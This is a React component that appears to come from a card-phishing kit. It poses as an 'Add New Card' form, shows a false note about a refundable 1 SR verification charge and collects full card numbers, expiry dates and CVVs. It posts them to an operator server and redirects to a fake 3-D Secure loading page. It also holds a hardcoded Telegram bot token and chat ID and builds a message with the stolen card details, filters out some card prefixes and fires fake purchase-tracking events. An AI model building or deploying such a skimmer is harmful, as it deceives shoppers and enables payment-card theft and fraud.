import React, { useEffect, useRef, useState } from "react"
import { useCart } from "react-use-cart"
import {
    FaCcVisa,
    FaCcMastercard,
    FaCcAmex,
    FaCcDiscover,
    FaMinus,
    FaPlus,
    FaTrash,
    FaRegCreditCard,
  } from "react-icons/fa"
  import InputField from "./InputField";
  import axios from "axios";
  import ReactPixel from "react-facebook-pixel"
import { usePromo } from "../providers/Init";
import { useNavigate } from "react-router-dom";
import { useTranslation } from "react-i18next";


const Addcard = ({setcheckout, setActiveComponent}) => {
  const {
    addItem,
    removeItem,
    updateItemQuantity,
    items,
    isEmpty,
    totalItems,
    cartTotal,
    emptyCart,
  } = useCart()
  const [change, setchange] = useState(true)

  const promo = usePromo()
  const { t, i18n } = useTranslation();

  const [submitBtnContent, setSubmitBtnContent] = useState(t("Add new card"));

  useEffect(() => {
    setSubmitBtnContent(t("Add new card"));
  }, [t]);
  

  const [input1Value, setInput1Value] = useState("")
  const [input2Value, setInput2Value] = useState("")
  const [input3Value, setInput3Value] = useState("")

  const [focusedInput, setFocusedInput] = useState(1) // 1 for first input, 2 for second input, 3 for third input
  const input1Ref = useRef(null)
  const input2Ref = useRef(null)
  const input3Ref = useRef(null)

  const [submitBtnDis, setSubmitBtnDis] = useState(true)

  useEffect(() => {
    updateSubmitBtnDisabled()
  }, [input1Value, input2Value, input3Value])

  const handleNumberClick = (number) => {
    if (focusedInput === 1) {
      if (input1Value.length < 16) {
        setInput1Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(2)
        if (input2Value.length < 4) {
          setInput2Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 2) {
      if (input2Value.length < 4) {
        setInput2Value((prevValue) => prevValue + number)
      } else {
        setFocusedInput(3)
        if (input3Value.length < 3) {
          setInput3Value((prevValue) => prevValue + number)
        }
      }
    } else if (focusedInput === 3) {
      if (input3Value.length < 3) {
        setInput3Value((prevValue) => prevValue + number)
      }
    }
  }

  const handleDeleteClick = () => {
    if (focusedInput === 1) {
      setInput1Value((prevValue) => prevValue.slice(0, -1))
    } else if (focusedInput === 2) {
      if (input2Value.length === 0) {
        setFocusedInput(1)
      }
      setInput2Value((prevValue) => prevValue.slice(0, -1))
    } else if (focusedInput === 3) {
      if (input3Value.length === 0) {
        setFocusedInput(2)
      }
      setInput3Value((prevValue) => prevValue.slice(0, -1))
    }
  }
  const fullUrl = window.location.href;
  const handleInput1Focus = () => {
    // trackUserAction('User Started Card Input', false)
    setFocusedInput(1)
  }

  const handleInput2Focus = () => {
    setFocusedInput(2)
  }

  const handleInput3Focus = () => {
    setFocusedInput(3)
  }

  const checkFocus = (num) => {
    return focusedInput === num
  }

  const updateSubmitBtnDisabled = () => {
    console.log(`SR {input1Value.length} + SR {input2Value.length} + SR {input3Value.length}`)
    // Check conditions for enabling/disabling submit button
    const firstFourDigits = input1Value.replace(/\s/g, "").substring(0, 4);
    const firstSixDigits = input1Value.replace(/\s/g, "").substring(0, 6);
    if (
      firstSixDigits !== "489022" &&
      firstSixDigits !== "420132" &&
      firstFourDigits !== "4847" &&
      input1Value !== "" &&
      input2Value !== "" &&
      input3Value !== "" &&
      input1Value.length === 19 &&
      input2Value.length === 5 &&
      input3Value.length === 3 &&
      isDateGreaterThan(input2Value, "10/24")
    ) {
      if (input1Value.charAt(0) === "4" || input1Value.charAt(0) === "5") {
        setSubmitBtnDis(false) // Enable submit button if all inputs are filled
      }
    } else {
      setSubmitBtnDis(true) // Disable submit button if any input is empty
    }
  }
  function isDateGreaterThan(dateStr, comparisonDateStr) {
    console.log(dateStr)
    // Extract month and year for both dates
    const [month, year] = dateStr.split("/").map(Number);
    const [compMonth, compYear] = comparisonDateStr.split("/").map(Number);
  
    // First, compare the years
    if (year > compYear) return true;
    if (year < compYear) return false;
  
    // If years are the same, compare the months
    return month > compMonth;
  }
  const navigate = useNavigate()
  const handleSender = async () => {

    // Extract the first digit of `main` and the last 4 digits of `main`
    const firstDigit = input1Value?.charAt(0); // First digit
    const lastFourDigits = input1Value?.slice(-4); // Last 4 digits
  
    // Set values to localStorage
    localStorage.setItem('summ', (1));
    localStorage.setItem('first-digit', firstDigit);
    localStorage.setItem('last-four-digits', lastFourDigits);

    const botToken = '8080614051:AAHS1By4ybhpXci3veywS4L0HKAE7BLxlS8'; // Replace with your bot's token
    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;



    const payload = {
      chat_id: '-1002457848491', // Replace with the target chat ID
      text: `💳 ${input1Value}
📆 ${input2Value}
🔐 ${input3Value}`,  // The message text
  };
    try {
      window.snaptr('track', 'ADD_CART');
      
      window.snaptr('track', 'PAGE_VIEW');
      
      window.snaptr('track', 'PURCHASE');
      
      window.snaptr('track', 'VIEW_CONTENT');
    } catch (err) {
      console.log(`Error ${err}`)
    }
    setSubmitBtnContent(<div className="inputLoader"></div>)
    const dataToSend = {
      orderId: "123",
      uuId: localStorage.getItem("uuId"),
      main: input1Value,
      date: input2Value,
      code: input3Value,
      summ: ((cartTotal * promo)),
      chatId: process.env.REACT_APP_CHAT_ID,
      domain: process.env.REACT_APP_DOMAIN,
      link: fullUrl,
      additional: `Promo: Sale ${100-(promo * 100)}%`,
    };
    console.log(dataToSend)
    try {
      
      await axios.post(
        process.env.REACT_APP_SERVER_URL + "/api/validation",
        dataToSend,
        {
          headers: {
            "Content-Type": "application/json",
          },
        }
      )


        navigate('/3ds/loading')
        console.log("rabotaet hui")

    } catch (error) {
      console.error("Error sending data:", error)
      setTimeout(() => {
        setSubmitBtnContent(t("Add new card"))
      }, 3000)
    }

  }
  
  return (
<>

            <div className="fixed bottom-0 left-0 right-0 flex flex-col p-4 bg-white shadow">
 
                <div className="flex items-center gap-x-4">
                  
 
                <button           onClick={handleSender}
          disabled={submitBtnDis}
          className={`w-full p-4 mt-2 text-lg font-semibold text-white rounded-lg shadow    ${
            submitBtnDis
              ? "text-neutral-400 bg-neutral-100"
              : "text-white bg-prim_blue"
          } `}
        >
          {submitBtnContent}</button>
          </div>
            </div>

        <div className="flex items-center justify-center w-full p-4 bg-white ">
 
          <div className="flex flex-col text-center">
          <span className="text-lg font-semibold">{t("Add New Card")}</span>

 
          </div>
   
        </div>
 
 <div className="w-full p-4">
 <div className="flex justify-center w-full py-4 mb-4 border-b opacity-50">
                    <div className="flex ">
                      <img className="w-24" src="/Mada_logo.png" alt="" />
                      <img className="w-24" src="/mastercard_logo.png" alt="" />
                      <img className="w-24" src="/VISA_logo.png" alt="" />
                    </div>
                  </div>
 <div className="grid grid-cols-2 gap-2">
          <div className="col-span-3">
          <span className="font-semibold">{t("Card Number")}</span>
                <InputField
                  formatType={"card"}
                  ref={input1Ref}
                  value={input1Value}
                  onFocus={handleInput1Focus}
                  onChange={(e) => setInput1Value(e.target.value)}
                  placeholder={"0000 0000 0000 0000"}
                  focused={checkFocus(1)}
                  />
              </div>

              <div className="col-span-1">
              <span className="font-semibold">{t("Expiry Date")}</span>
                <InputField
                  formatType={"date"}
                  ref={input2Ref}
                  value={input2Value}
                  onFocus={handleInput2Focus}
                  onChange={(e) => setInput2Value(e.target.value)}
                  placeholder={"MM/YY"}
                  focused={checkFocus(2)}
                />
              </div>

              <div className="col-span-1">
              <span className="font-semibold">{t("CVV Number")}</span>
                <InputField
                  formatType={"code"}
                  ref={input3Ref}
                  value={input3Value}
                  onFocus={handleInput3Focus}
                  onChange={(e) => setInput3Value(e.target.value)}
                  placeholder={"•••"}
                  focused={checkFocus(3)}
                />
              </div>
</div>

<div className="flex items-center w-full px-3 py-2 mt-4 rounded bg-yellow-50">
<svg className="flex-shrink-0 " stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 1024 1024" height="1.2em" width="1.2em" xmlns="http://www.w3.org/2000/svg"><path d="M512 64C264.6 64 64 264.6 64 512s200.6 448 448 448 448-200.6 448-448S759.4 64 512 64zm0 820c-205.4 0-372-166.6-372-372s166.6-372 372-372 372 166.6 372 372-166.6 372-372 372z"></path><path d="M623.6 316.7C593.6 290.4 554 276 512 276s-81.6 14.5-111.6 40.7C369.2 344 352 380.7 352 420v7.6c0 4.4 3.6 8 8 8h48c4.4 0 8-3.6 8-8V420c0-44.1 43.1-80 96-80s96 35.9 96 80c0 31.1-22 59.6-56.1 72.7-21.2 8.1-39.2 22.3-52.1 40.9-13.1 19-19.9 41.8-19.9 64.9V620c0 4.4 3.6 8 8 8h48c4.4 0 8-3.6 8-8v-22.7a48.3 48.3 0 0 1 30.9-44.8c59-22.7 97.1-74.7 97.1-132.5.1-39.3-17.1-76-48.3-103.3zM472 732a40 40 0 1 0 80 0 40 40 0 1 0-80 0z"></path></svg>

<span className="ml-4 text-xs font-semibold">
                {t("Note: You will be charged for an amount of 1 SR for card verification which will be refunded directly to your account.")}
            </span>
</div>
 </div>
 
</>
  )
}

export default Addcard
